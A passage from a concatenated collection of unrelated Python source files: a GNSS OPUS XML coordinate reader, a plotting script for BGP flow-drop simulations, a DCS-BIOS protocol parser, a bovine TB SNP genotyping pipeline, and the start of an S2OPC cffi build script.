        system='LLA',
        ref_frame='NAD_83(2011)',
        unit='m'
    ) -> list:
        """
        Extract the coordinate from an OPUS XML file POSITION elements, and return it in the desired units and coordinate spec type.

        Parameters
        ----------
        system (str) : coordinate projection of the returned coordinate, valid values are 'LLA', 'LLH', or 'XYZ'.
        ref_frame (str) : the reference frame to select, OPUS currently offers NAD_83(2011) and IGS08.
        unit (str) : distance units of the returned coordinate, valid values are 'm', 'ft' or 'sft'.

        Returns
        -------
        coords (list of pint Quantity) : ellipsoidal coordinates (LLA or LLH), or rectilinear XYZ coordinates.

        Raises
        ------
        ValueError : if the reference frame is absent or *system* is invalid.
        """
        ureg = pint.UnitRegistry()
        # As above: find() returns None on no match; check explicitly.
        position = self.root.find('POSITION[REF_FRAME="{}"]'.format(ref_frame))
        if position is None:
            logger.error("Unable to find a position with reference frame: {}".format(ref_frame))
            raise ValueError("Unable to find a position with reference frame: {}".format(ref_frame))
        if system in ['LLA', 'LLH']:
            lat_d = int(position.find('COORD_SET/ELLIP_COORD/LAT/DEGREES').text) * ureg('arcdeg')
            lat_m = int(position.find('COORD_SET/ELLIP_COORD/LAT/MINUTES').text) * ureg('arcmin')
            lat_s = float(position.find('COORD_SET/ELLIP_COORD/LAT/SECONDS').text) * ureg('arcsec')
            lon_d = int(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/DEGREES').text) * ureg('arcdeg')
            lon_m = int(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/MINUTES').text) * ureg('arcmin')
            lon_s = float(position.find('COORD_SET/ELLIP_COORD/EAST_LONG/SECONDS').text) * ureg('arcsec')
            lat = lat_d + lat_m + lat_s
            lon = lon_d + lon_m + lon_s
            # OPUS stores east longitude; normalize to the [-180, 180] range.
            if lon.magnitude > 180:
                lon = lon - 360 * ureg('arcdeg')
            if system == 'LLA':
                # Ellipsoidal height.
                h_src = float(position.find('COORD_SET/ELLIP_COORD/EL_HEIGHT').text) * ureg(position.find('COORD_SET/ELLIP_COORD/EL_HEIGHT').get('UNIT'))
            elif system == 'LLH':
                # Orthometric height.
                h_src = float(self.root.find('ORTHO_HGT').text) * ureg(self.root.find('ORTHO_HGT').get('UNIT'))
            h = h_src.to(unit)
            return [lon, lat, h]
        elif system == 'XYZ':
            X = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="X"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="X"]').get('UNIT'))
            Y = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Y"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Y"]').get('UNIT'))
            Z = float(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Z"]').text) * ureg(position.find('COORD_SET/RECT_COORD/COORDINATE[@AXIS="Z"]').get('UNIT'))
            coords_src = [X, Y, Z]
            coords = [c.to(unit) for c in coords_src]
            return coords
        else:
            # Previously a bare `raise` with no active exception, which would
            # surface as RuntimeError; raise a meaningful error instead.
            logger.error("{} is not an accepted value for system".format(system))
            raise ValueError("{} is not an accepted value for system".format(system))

    def ref_frames(self) -> list:
        """Return the text of every REF_FRAME element in the document."""
        ref_frames = self.root.xpath('//REF_FRAME/text()')
        return ref_frames
|
<reponame>openalto/network-simulator-data<gh_stars>0
#!/usr/bin/env python3
# import csv
import sys
# from sfp_eval.draw_bin.flow_loss_stat import Result
import numpy as np
import matplotlib.pyplot as plt
def generate_plots(data, filename):
    """Render the grouped bar chart of failed flows/volume and save it to *filename*.

    NOTE(review): *data* is currently unused; the bar heights below are
    hard-coded results from earlier simulation runs — confirm before reuse.
    """
    num_groups = 3
    # Drop ratios in percent for 1/3/5 networks applying the policies.
    drop_cbgp_flow = 100 * np.array([112558, 144199, 213338]) / 223403
    drop_fbgp_flow = 100 * np.array([0, 0, 0])
    drop_sfp_flow = 100 * np.array([0, 0, 0])
    drop_cbgp_vol = 100 * np.array([372723424501441, 476423418691906, 693306747619368]) / 726039461241118
    drop_fbgp_vol = 100 * np.array([0, 0, 0])
    drop_sfp_vol = 100 * np.array([0, 0, 0])

    x_pos = np.arange(num_groups)
    bar_width = 0.1

    fig, ax = plt.subplots()
    fig.subplots_adjust(bottom=0.15)
    # Four bars per group: flows then volume, C-BGP and SFP.
    ax.bar(x_pos, drop_cbgp_flow, bar_width, color='r', label='C-BGP (Flows)')
    ax.bar(x_pos + 2 * bar_width, drop_sfp_flow, bar_width, color='m', label='SFP (Flows)')
    ax.bar(x_pos + bar_width, drop_cbgp_vol, bar_width, color='g', label='C-BGP (Volume)')
    ax.bar(x_pos + 3 * bar_width, drop_sfp_vol, bar_width, color='b', label='SFP (Volume)')

    ax.set_ylabel('Fraction of failed flows/volume (%)', fontsize=14)
    # Center the group tick between the four bars.
    ax.set_xticks(x_pos + 1.5 * bar_width)
    ax.set_xticklabels(('1', '3', '5'))
    ax.set_xlabel('Number of networks applied the fine-grained block policies', fontsize=14)
    ax.legend(ncol=2)

    fig.set_size_inches(6.4, 3.8)
    fig.savefig(filename)
if __name__ == '__main__':
    # Output file prefix is the single required command-line argument.
    filename = sys.argv[1]
    # The CSV aggregation below is kept commented out for reference; the
    # current plot uses the hard-coded values inside generate_plots().
    # final = {i: {
    #     'CGFP-BGP': Result(),
    #     'CGC-BGP': Result(),
    #     'SFP': Result(),
    #     'SFP on CGC-BGP Reachable Flows': Result()
    # } for i in [1, 3, 5]}
    final = {}
    # for i in [1, 3, 5]:
    #     with open(filename + '-%d.csv' % i) as f:
    #         reader = csv.reader(f, delimiter='\t')
    #         count = 0
    #         for row in reader:
    #             if count % 4 == 0:
    #                 obj = final[i]['CGFP-BGP']  # type: Result
    #             elif count % 4 == 1:
    #                 obj = final[i]['CGC-BGP']  # type: Result
    #             elif count % 4 == 2:
    #                 obj = final[i]['SFP']  # type: Result
    #             else:
    #                 obj = final[i]['SFP on CGC-BGP Reachable Flows']
    #             count += 1
    #             obj.merge(Result(row))
    generate_plots(final, filename+".pdf")
|
<gh_stars>1-10
from __future__ import print_function
from __future__ import unicode_literals
import sys
# Indexing a byte string yields a 1-char str on Python 2 but an int on
# Python 3; byte2int() hides that difference from the rest of the module.
_IS_PY2 = sys.version_info[0] == 2


def byte2int(b):
    """Return the integer value of the first byte of *b*."""
    return ord(b) if _IS_PY2 else b[0]
import struct
class ProtocolParser:
    """State machine that decodes a DCS-BIOS-style export byte stream.

    The stream consists of frames introduced by four 0x55 sync bytes,
    followed by (address, count, data-word...) records.  Registered
    ``write_callbacks`` receive ``(address, 16-bit word)`` for every decoded
    word; ``frame_sync_callbacks`` fire each time a sync sequence is seen.
    """

    def __init__(self):
        # Current decoder state; transitions happen in processByte().
        self.__state = "WAIT_FOR_SYNC"
        self.__sync_byte_count = 0  # consecutive 0x55 bytes seen so far
        self.__address = 0          # write address of the record being decoded
        self.__count = 0            # payload bytes remaining in the record
        self.__data = 0             # 16-bit data word being assembled
        self.write_callbacks = set()       # called as callback(address, word)
        self.frame_sync_callbacks = set()  # called as callback() on each sync

    def processByte(self, c):
        """Feed one byte (bytes of length 1, or an int) into the state machine."""
        c = byte2int(c)
        if self.__state == "ADDRESS_LOW":
            self.__address = c
            self.__state = "ADDRESS_HIGH"
        elif self.__state == "ADDRESS_HIGH":
            self.__address += c*256
            # Address 0x5555 is part of the sync pattern, not a real record,
            # so fall back to waiting for a fresh sync in that case.
            if self.__address != 0x5555:
                self.__state = "COUNT_LOW"
            else:
                self.__state = "WAIT_FOR_SYNC"
        elif self.__state == "COUNT_LOW":
            self.__count = c
            self.__state = "COUNT_HIGH"
        elif self.__state == "COUNT_HIGH":
            self.__count += 256*c
            self.__state = "DATA_LOW"
        elif self.__state == "DATA_LOW":
            self.__data = c
            self.__count -= 1
            self.__state = "DATA_HIGH"
        elif self.__state == "DATA_HIGH":
            self.__data += 256*c
            self.__count -= 1
            # A complete 16-bit word has been assembled: notify listeners.
            for callback in self.write_callbacks:
                callback(self.__address, self.__data)
            # Consecutive words belong to consecutive (2-byte) addresses.
            self.__address += 2
            if self.__count == 0:
                self.__state = "ADDRESS_LOW"
            else:
                self.__state = "DATA_LOW"
        # Sync detection runs on EVERY byte, regardless of state, so the
        # parser can resynchronize anywhere in a corrupted stream: four
        # consecutive 0x55 bytes always restart frame decoding.
        if c == 0x55:
            self.__sync_byte_count += 1
        else:
            self.__sync_byte_count = 0
        if self.__sync_byte_count == 4:
            self.__state = "ADDRESS_LOW"
            self.__sync_byte_count = 0
            for callback in self.frame_sync_callbacks:
                callback()
class StringBuffer:
    """Accumulates a fixed-length, NUL-terminated string from export writes.

    Registers itself on *parser* so that every decoded (address, word) pair
    is offered to this buffer; when the end-of-frame marker address 0xFFFE
    is written and the buffer changed, each callback receives the decoded
    string (latin-1, up to the first NUL byte).
    """

    def __init__(self, parser, address, length, callback):
        self.__address = address
        self.__length = length
        self.__dirty = False
        self.buffer = bytearray(length)
        self.callbacks = set()
        if callback:
            self.callbacks.add(callback)
        parser.write_callbacks.add(lambda address, data: self.on_dcsbios_write(address, data))

    def set_char(self, index, char):
        """Store one byte, flagging the buffer dirty only on actual change."""
        if self.buffer[index] != char:
            self.buffer[index] = char
            self.__dirty = True

    def on_dcsbios_write(self, address, data):
        """Consume a 16-bit little-endian word written at *address*."""
        start = self.__address
        end = start + self.__length
        if start <= address < end:
            low, high = struct.pack("<H", data)
            self.set_char(address - start, low)
            # The high byte may fall past the end of this buffer.
            if address + 1 < end:
                self.set_char(address - start + 1, high)
        if address == 0xfffe and self.__dirty:
            self.__dirty = False
            text = self.buffer.split(b"\x00")[0].decode("latin-1")
            for callback in self.callbacks:
                callback(text)
class IntegerBuffer:
    """Tracks a masked, shifted integer field located at one export address.

    Registers itself on *parser*; whenever the extracted value changes,
    every callback is invoked with the new value.
    """

    def __init__(self, parser, address, mask, shift_by, callback):
        self.__address = address
        self.__mask = mask
        self.__shift_by = shift_by
        self.__value = None  # None until the first write is observed
        self.callbacks = set()
        if callback:
            self.callbacks.add(callback)
        parser.write_callbacks.add(lambda address, data: self.on_dcsbios_write(address, data))

    def on_dcsbios_write(self, address, data):
        """Extract the field from *data* if *address* matches; notify on change."""
        if address != self.__address:
            return
        new_value = (data & self.__mask) >> self.__shift_by
        if new_value == self.__value:
            return
        self.__value = new_value
        for callback in self.callbacks:
            callback(new_value)
|
import csv, pickle, operator, os, sys
import collections
from functools import reduce

# parsing the arguments
args=sys.argv
if len(args)<2:
    # No CLI arguments: fall back to hard-coded development defaults.
    # NOTE(review): the glob-style defaults ("*.csv", "*.vcf") rely on the
    # working directory containing exactly one matching file — confirm.
    pathTBRuns=(os.path.dirname(os.getcwd()))
    instats="*.csv"
    pathPatterns="/home/richard/MyScripts/BovTB-nf/references/Stage1_patterns"
    refName="Mycbovis-2122-97_LT708304.fas"
    TBRun ="test"
    qth=8               # minimum mean depth of coverage
    thMinGoodCov=2      # minimum good coverage per site
    thCovProp=0.2       # maximum allowed proportion of contradicting reads
    thqualsnp=150       # minimum quality to accept a SNP call
    thqualnonsnp=0      # minimum quality to accept a reference call
    strainVCF="*.vcf"
else:
    # Positional CLI arguments (see defaults above for meaning).
    pathTBRuns=(os.path.dirname(os.getcwd()))
    instats=sys.argv[1]
    pathPatterns=sys.argv[2]
    refName=sys.argv[3]
    TBRun=sys.argv[4]
    qth=int(sys.argv[5])
    thMinGoodCov=int(sys.argv[6])
    thCovProp=float(sys.argv[7])
    thqualsnp=int(sys.argv[8])
    thqualnonsnp=int(sys.argv[9])
    strainVCF=sys.argv[10]

# Reference SNP pattern files used by the stage-1 genotyping below.
patternsDetailsFile="CSSnewclusters_LT708304_230119.csv" #"CSSnewclusters_181115.csv" #"patterns20131220.csv" "CSSnewclusters_LT708304_181217.csv"
patternsBritishBTBFile="patternsBritishBTB_LT708304.csv"
patternsPinnipediiFile="patternsPinnipedii_LT708304.csv"
patternsMic_PinFile="patternsMic_Pin_LT708304.csv"
patternsMicrotiFile="patternsMicroti_LT708304.csv"
patternsBTBFile="patternsBTB_LT708304.csv"
# reads a csv file
# return a list where each element is a list containing the element of a row.
def readTable(fname,ch):
    """Read a delimited text file and return its rows.

    Parameters
    ----------
    fname : path of the file to read.
    ch : single-character field delimiter.

    Returns
    -------
    list of lists, one inner list of string fields per row.
    """
    # Use a context manager so the handle is closed even on error, and
    # newline='' as recommended by the csv module documentation.
    with open(fname, "r", newline="") as infile:
        return [row for row in csv.reader(infile, delimiter=ch)]
# writes a list into a csv file
# each element in the list is written as a row in the csv file
def writeCSV(fname,matrix):
    """Write *matrix* (a list of row lists) to *fname* as CSV.

    Bug fix: the file is now opened with newline='' as required by the csv
    module; without it, csv.writer emits an extra blank line between rows
    on Windows.
    """
    with open(fname, "w", newline="") as fileOut:
        writer = csv.writer(fileOut)
        writer.writerows(matrix)
    print("file "+fname+" saved.")
# transposes a python list
def listT(matrix):
    """Transpose a list of lists: rows become columns and vice versa."""
    return [list(column) for column in zip(*matrix)]
# compares a strain gSS base calls (strpat) to the a genotype group pattern give by groPat
# strPat is the reference patern.
# it returns two values, a list with the percentage of matches (M), mismatches (MM), notCovered (N) and anomalous (A).
# The second list is a vector with the same length as strPat with Ms, MMs,Ns and As as corresponding.
#This part does the matching - finds the closest reference SNP combination on a per sample basis
def comparePatterns(refPat,strPat,groPat):
    """Compare a strain's base calls against a genotype-group pattern.

    Each position is classified as a match (M), mismatch (MM), not covered
    (N) or anomalous (A), using *refPat* as the reference pattern.

    Returns a two-element list: percentages [M, MM, N, A] (rounded to two
    decimals), and the per-position classification vector.
    """
    lenPat=len(refPat)
    if lenPat!=len(strPat) or lenPat!=len(groPat):
        print("Different values refPat,strPat,groPat: "+str(lenPat)+" "+str(len(strPat))+" "+str(len(groPat)))
    res=[]
    for i in range(lenPat):
        base = strPat[i].upper()
        if base == "N":
            res.append("N")                 # position not covered
        elif base not in ('A', 'C', 'G', 'T'):
            res.append("A")                 # non-nucleotide call -> anomalous
        elif base == groPat[i]:
            res.append("M")                 # agrees with the group pattern
        elif base == refPat[i] or groPat[i] == refPat[i]:
            res.append("MM")                # disagrees at an informative site
        else:
            res.append("A")                 # disagrees with both -> anomalous
    tally = collections.Counter(res)
    counts = [round(100 * float(tally[key]) / lenPat, 2) for key in ('M', 'MM', 'N', 'A')]
    return [counts, res]
#this is the key part that runs the per sample stage1 genotyping
def findGenotypeOneSample(strainsDetailsTittle,strainDetails,pathTBRuns,patternsDetails,patternsBritishBTBDetails,patternsBTBDetails,patternsMic_PinDetails,patternsMicrotiDetails,patternsPinnipediiDetails,refName,qth,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp):
    """Run the stage-1 genotyping decision tree for one sample.

    The sample's VCF base calls are compared against successively more
    specific reference pattern sets (bTB -> British bTB, or
    Microti/Pinnipedii for non-bTB), each accepted when the best match
    percentage is at least 70.  Samples below the *qth* mean-coverage
    threshold are flagged 'LowCoverage' without genotyping.

    Returns [maxPat, strainQ]: the sample row extended with the flag and
    best-match statistics, and (for bTB samples) the per-position detail
    table, otherwise the string "NA".
    """
    pmeanCov=strainsDetailsTittle.index('MeanDepth')
    pfileName=strainsDetailsTittle.index('Sample')
    name=[strainDetails[pfileName]]
    meanCov=float(strainDetails[pmeanCov])
    strainStatsFileName=strainDetails[pfileName]+".pileup.vcf"
    # NOTE: these are one-shot map iterators (Python 3); they are consumed
    # exactly once by getSnpsStatsStrain below.
    posToExtract=map(int,patternsDetails[0][1:])
    posToExtractBritishBTB=map(int,patternsBritishBTBDetails[0][1:])
    posToExtractBTB=map(int,patternsBTBDetails[0][1:])
    posToExtractMic_Pin=map(int,patternsMic_PinDetails[0][1:])
    posToExtractMicroti=map(int,patternsMicrotiDetails[0][1:])
    posToExtractPinnipedii=map(int,patternsPinnipediiDetails[0][1:])
    # change flags in this section
    # If the match to the first reference dataset is above a given threshold the process moves to the next
    # This is iterated depending on the outcomes
    [strainGSSInfo,strainGSSBritishBTBInfo,strainGSSBTBInfo,strainGSSMic_PinInfo,strainGSSMicrotiInfo,strainGSSPinnipediiInfo]=getSnpsStatsStrain(strainStatsFileName,[posToExtract,posToExtractBritishBTB,posToExtractBTB,posToExtractMic_Pin,posToExtractMicroti,posToExtractPinnipedii],pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp)
    if meanCov >=qth:
        BTB=getBestMatchPattern(patternsBTBDetails,strainGSSBTBInfo)[0]
        if BTB[0]=="bTB" and BTB[2]>=70:
            # Sample is bTB; refine to British vs non-British, then pick the
            # best-matching cluster from the full pattern set.
            flag="bTB"
            BritishBTB=getBestMatchPattern(patternsBritishBTBDetails,strainGSSBritishBTBInfo)[0]
            if BritishBTB[0]=="BritishbTB" and BritishBTB[2]>=70:
                flag="BritishbTB"
            else:
                flag="nonBritishbTB"
            [maxPat,strainQ]=getBestMatchPattern(patternsDetails,strainGSSInfo)
            maxPat=strainDetails+[flag]+maxPat
            strainQ=[name]+strainQ
            return [maxPat,strainQ]
        else:
            # Not bTB: try the Microti/Pinnipedii branch.
            Mic_Pin=getBestMatchPattern(patternsMic_PinDetails,strainGSSMic_PinInfo)[0]
            if Mic_Pin[0]=="MicPin" and Mic_Pin[2]>=70:
                Microti=getBestMatchPattern(patternsMicrotiDetails,strainGSSMicrotiInfo)[0]
                if Microti[0]=="Microti" and Microti[2]>=70:
                    flag="Microti"
                    maxPat=strainDetails+[flag]+Microti
                    return [maxPat,"NA"]
                else:
                    Pinnipedii=getBestMatchPattern(patternsPinnipediiDetails,strainGSSPinnipediiInfo)[0]
                    if Pinnipedii[0]=="Pinnipedii" and Pinnipedii[2]>=70:
                        flag="Pinnipedii"
                        maxPat=strainDetails+[flag]+Pinnipedii
                        print(maxPat)
                        return [maxPat,"NA"]
                    else:
                        flag="MicPin"
                        maxPat=strainDetails+[flag]+Mic_Pin
                        return [maxPat,"NA"]
            else:
                flag="nonbTB"
                maxPat=strainDetails+[flag]+BTB
                return [maxPat,"NA"]
    else:
        # Mean coverage below threshold: no genotype call is attempted.
        flag="LowCoverage"
        maxPat=strainDetails+[flag]+6*["NA"]
        print(maxPat)
        return [maxPat,"NA"]
def getSnpsStatsStrain(strainStatsFileName,listas,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp):
    """Extract filtered base calls at the requested positions from a VCF.

    For every list of genome positions in *listas*, return a list of
    [position, call, quality, total_depth, covRF, covRR, covAF, covAR]
    rows; *call* is 'n' when no confident call passes the thresholds.

    NOTE(review): the file actually opened (and deleted afterwards) is the
    module-level ``strainVCF``, NOT the ``strainStatsFileName`` parameter,
    which is only printed — confirm this reliance on a single VCF per
    working directory is intentional.
    """
    print("loading "+ strainStatsFileName)
    fileIn = open(strainVCF, 'r')
    # NOTE: the local name `csv` shadows the imported csv module inside this
    # function; here it is a dict mapping position (str) -> split VCF fields,
    # with header lines and INDEL records skipped.
    csv=fileIn.readlines()
    fileIn.close()
    csv=dict([(t.split()[1],t.split()) for t in csv if t[0]!="#" and "INDEL" not in t])
    listasOut=[]
    for lista in listas:
        out=[]
        for i in lista:
            # Default row: position not found / no confident call.
            nu=[i,"n","NA","NA","NA","NA","NA","NA"]
            try:
                line=csv[str(i)]
            except:
                # Position absent from the VCF: keep the default row.
                out=out+[nu]
                continue
            ref=line[3]
            if line[4]==".":
                # '.' means no alternative allele was called.
                alt=line[3]
            else:
                alt=line[4]
            qual=float(line[5])
            det=line[7].split(";")
            if "DP4=" in line[7]:
                call="n"
                # DP4 = reads supporting ref-forward, ref-reverse,
                # alt-forward, alt-reverse.
                gcovRF,gcovRR,gcovAF,gcovAR=map(int,[s for s in det if "DP4=" in s][0].split("DP4=")[1].split(","))
                if ref.upper() in ["A","C","G","T"] and alt.upper() in ["A","C","G","T"]:
                    # Require coverage on both strands before calling.
                    if gcovRF+gcovAF>0 and gcovRR+gcovAR>0:
                        # Reference call: high-enough quality/depth, and the
                        # contradicting-read proportion below thCovProp.
                        if ref.upper()==alt.upper() and qual>thqualnonsnp and gcovRF+gcovRR>thMinGoodCov and float(gcovAF)/(gcovRF+gcovAF)<thCovProp and float(gcovAR)/(gcovRR+gcovAR)<thCovProp:
                            call=ref.upper()
                        # SNP call: symmetric criteria on the alt allele.
                        if ref.upper()!=alt.upper() and qual>thqualsnp and gcovAF+gcovAR>thMinGoodCov and float(gcovRF)/(gcovRF+gcovAF)<thCovProp and float(gcovRR)/(gcovRR+gcovAR)<thCovProp:
                            call=alt.upper()
                nu=[i,call,qual,gcovRF+gcovRR+gcovAF+gcovAR,gcovRF,gcovRR,gcovAF,gcovAR]
            out=out+[nu]
        listasOut=listasOut+[out]
    print("snps Extracted in lists of length:")
    itemLen = [len(item) for item in listasOut]
    print(itemLen)
    # Side effect: the input VCF is removed once processed.
    os.system("rm "+strainVCF)
    return listasOut
def isACGT(c):
    """Return True when *c* is one of the four DNA bases (case-insensitive)."""
    return c.upper() in ("A", "C", "G", "T")
def readTVSFile(fname):
    """Read a comma-delimited file and return its rows as lists of strings.

    Bug fix: the file was previously opened in binary mode ('rb'), which
    makes csv.reader raise under Python 3 (it requires text-mode input);
    it is now opened in text mode with newline='' as the csv docs require,
    and closed via a context manager.
    """
    with open(fname, "r", newline="") as fileIn:
        return [row for row in csv.reader(fileIn)]
def getBestMatchPattern(patternsDetails,strainGSSInfo):
    """Find the genotype-group pattern that best matches the strain calls.

    *patternsDetails* is the (transposed) pattern table: row 0 holds the
    genome positions, row 2 the reference pattern, rows 3+ one pattern per
    genotype group.  *strainGSSInfo* holds [position, call, ...] rows for
    the same positions, in the same order (verified below).

    Returns [maxPat, strainQ]: the best match summary
    [group, n_sites, %M, %MM, %N, %A] and a per-position detail table.
    """
    print("matching positions:")
    # Sanity check: pattern positions must align 1:1 with the strain calls.
    hal=[int(x) for x in patternsDetails[0][1:]]==[x[0] for x in strainGSSInfo]
    if hal==False:sys.exit("matching positions is false")
    strainGSS=[x[1] for x in strainGSSInfo]
    refPat=patternsDetails[2][1:]
    maxVal=0
    maxPat=[]
    maxgroPat=[]
    maxgroRes=[]
    for pattern in patternsDetails[3:]:
        groPat=pattern[1:]
        groRes=comparePatterns(refPat,strainGSS,groPat)
        # comp = [group name, number of sites, %M, %MM, %N, %A]
        comp=[pattern[0],len(groPat)]+groRes[0]
        if comp[2]>=maxVal:
            # Keep the pattern with the highest match percentage (>= keeps
            # the last of any ties).
            maxVal=comp[2]
            maxPat=comp
            maxgroPat=groPat
            maxgroRes=groRes
        # NOTE(review): this fallback is effectively dead code — the first
        # iteration always satisfies comp[2] >= 0 == maxVal, so maxPat is
        # never empty here.  Also note that if patternsDetails has fewer
        # than four rows, the loop never runs and the line below would
        # raise NameError on `comp` — confirm inputs always have patterns.
        if maxPat==[]:
            maxPat=comp
            maxgroPat=groPat
            maxgroRes=groRes
    # Per-position detail: group base, classification, strain call, stats.
    strainQ=[[maxPat[0]]]+[maxPat[1:]]+[reduce(operator.add,[[y],[z],[x[1]],x[2:]]) for y,x,z in zip(maxgroPat,strainGSSInfo,maxgroRes[1])]
    return [maxPat,strainQ]
# ---- Stage-1 driver: load inputs, genotype every sample, write results ----
print(TBRun)
# Drop the file extension from the reference genome name.
refName=refName.split(".")[0]
strainDetailsFile=instats
# Results directory layout: <TBRun>/Stage1 with an Aux scratch subfolder.
pathResutls=os.path.join(TBRun,"Stage1")
if not os.path.exists(pathResutls): os.makedirs(pathResutls)
pathAux=os.path.join(pathResutls,"Aux")
if not os.path.exists(pathAux): os.system("mkdir "+ pathAux)
# Read the per-sample stats CSV and pick out the columns we need.
strainsInfo=readTable(strainDetailsFile,',')
pfileName=strainsInfo[0].index('Sample')
pmeanCov=strainsInfo[0].index('MeanDepth')
ppermap=strainsInfo[0].index('%Mapped')
totalReads=strainsInfo[0].index('NumRawReads')
genomeCov=strainsInfo[0].index('GenomeCov')
outcome=strainsInfo[0].index('Outcome')
strainsInfo=listT(strainsInfo)
strainsDetails=listT([strainsInfo[pfileName][1:],strainsInfo[genomeCov][1:],strainsInfo[pmeanCov][1:],strainsInfo[totalReads][1:],strainsInfo[ppermap][1:],strainsInfo[outcome][1:]])
strainsDetails=[['Sample','GenomeCov','MeanDepth','NumRawReads','pcMapped','Outcome',]]+strainsDetails
print("Processing "+ str(len(strainsDetails))+" samples")
# Load every reference pattern table (transposed so row 0 = positions).
patternsDetails=listT(readTable(os.path.join(pathPatterns,patternsDetailsFile),","))
patternsBritishBTBDetails=listT(readTable(os.path.join(pathPatterns,patternsBritishBTBFile),","))
patternsPinnipediiDetails=listT(readTable(os.path.join(pathPatterns,patternsPinnipediiFile),","))
patternsMic_PinDetails=listT(readTable(os.path.join(pathPatterns,patternsMic_PinFile),","))
patternsMicrotiDetails=listT(readTable(os.path.join(pathPatterns,patternsMicrotiFile),","))
patternsBTBDetails=listT(readTable(os.path.join(pathPatterns,patternsBTBFile),","))
# Output accumulators: summary rows and the per-position quality table.
maxPats=[strainsDetails[0]+["flag","group","CSSTested","matches","mismatches","noCoverage","anomalous"]]
maxPatsQ=[[[patternsDetails[0][0]]]+[["PredGenotype"],["M-MM-N-A"]]+[[x] for x in patternsDetails[0][1:]],[[patternsDetails[1][0]]]+[[""],[""]]+[[x] for x in patternsDetails[1][1:]],[[patternsDetails[2][0]]]+[[""],[""]]+[[x] for x in patternsDetails[2][1:]]]
outFileName="_stage1.csv"
for strainDetails in strainsDetails[1:]:
    print(strainDetails)
    [maxPat,strainQ]=findGenotypeOneSample(strainsDetails[0],strainDetails,pathTBRuns,patternsDetails,patternsBritishBTBDetails,patternsBTBDetails,patternsMic_PinDetails,patternsMicrotiDetails,patternsPinnipediiDetails,refName,qth,pathAux,thMinGoodCov,thCovProp,thqualsnp,thqualnonsnp)
    maxPats=maxPats+[maxPat]
    if strainQ!="NA":
        maxPatsQ=maxPatsQ+[strainQ]
os.system("rm -R "+pathAux)
# NOTE(review): the output file is written twice — first unsorted, then
# overwritten with the rows sorted by sample name; the first write appears
# redundant.  Confirm before removing.
writeCSV(outFileName,maxPats)
maxPats=[maxPats[0]]+sorted(maxPats[1:],key=lambda x: x[0])
writeCSV(outFileName,maxPats)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to Systerel under one or more contributor license
# agreements. See the NOTICE file distributed with this work
# for additional information regarding copyright ownership.
# Systerel licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this
# file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from cffi import FFI

ffibuilder = FFI()

# TODO: generate this file
# The expanded S2OPC header provides the full C API surface to cffi; the
# extern "Python" section appended below declares the Python-side callbacks
# that the C library is allowed to invoke.
header = open('./s2opc_expanded.h').read()
ffibuilder.cdef(header + r'''
# 1 "cffi-cdef"
/* Python callbacks that are callable from C */
extern "Python"
{
void _callback_log(SOPC_Log_Level log_level, SOPC_LibSub_CstString text);
void _callback_disconnected(SOPC_LibSub_ConnectionId c_id);
void _callback_datachanged(SOPC_LibSub_ConnectionId c_id, SOPC_LibSub_DataId d_id, SOPC_LibSub_Value* value);
void _callback_client_event(SOPC_LibSub_ConnectionId c_id, SOPC_LibSub_ApplicativeEvent event, SOPC_StatusCode status, const void* response, uintptr_t responseContext);
void _callback_toolkit_event(SOPC_App_Com_Event event, uint32_t IdOrStatus, void* param, uintptr_t appContext);
void _callback_address_space_event(const SOPC_CallContext* callCtxPtr, SOPC_App_AddSpace_Event event, void* opParam, SOPC_StatusCode opStatus);
SOPC_ReturnStatus _callback_validate_user_identity(SOPC_UserAuthentication_Manager* authenticationManager,
const SOPC_ExtensionObject* pUser,
SOPC_UserAuthentication_Status* pUserAuthenticated);
SOPC_ReturnStatus _callback_authorize_operation(SOPC_UserAuthorization_Manager* authorizationManager,
SOPC_UserAuthorization_OperationType operationType,
const SOPC_NodeId* nodeId,
uint32_t attributeId,
const SOPC_User* pUser,
bool* pbOperationAuthorized);
}
void SOPC_DataValue_Delete(SOPC_DataValue *datavalue);
''')

# C source compiled into the extension module: includes the expanded header,
# defines the security-policy constants, and a helper to free a DataValue.
source = r'''
#include "s2opc_expanded.h"
const char* SOPC_SecurityPolicy_None_URI = "http://opcfoundation.org/UA/SecurityPolicy#None";
const char* SOPC_SecurityPolicy_Basic128Rsa15 = "http://opcfoundation.org/UA/SecurityPolicy#Basic128Rsa15";
const char* SOPC_SecurityPolicy_Basic256_URI = "http://opcfoundation.org/UA/SecurityPolicy#Basic256";
const char* SOPC_SecurityPolicy_Basic256Sha256_URI = "http://opcfoundation.org/UA/SecurityPolicy#Basic256Sha256";
const uint8_t SOPC_SecurityMode_None_Mask = 0x01;
const uint8_t SOPC_SecurityMode_Sign_Mask = 0x02;
const uint8_t SOPC_SecurityMode_SignAndEncrypt_Mask = 0x04;
const uint8_t SOPC_SecurityMode_Any_Mask = 0x07;
const uint8_t SOPC_MaxSecuPolicies_CFG = 5;
void SOPC_DataValue_Delete(SOPC_DataValue *datavalue)
{
SOPC_DataValue_Clear(datavalue);
free(datavalue);
}
'''

# It (is said to) produces faster code with set_source, and checks what it can on the types.
# However, it requires a gcc.
# The other way, dlopen, loads the ABI, is less safe, slower, but only requires the .so/.dll
# TODO: automatize configuration
if os.name == 'nt':
    # Windows: link against the import libraries by full name.
    ffibuilder.set_source('_pys2opc',
                          source,
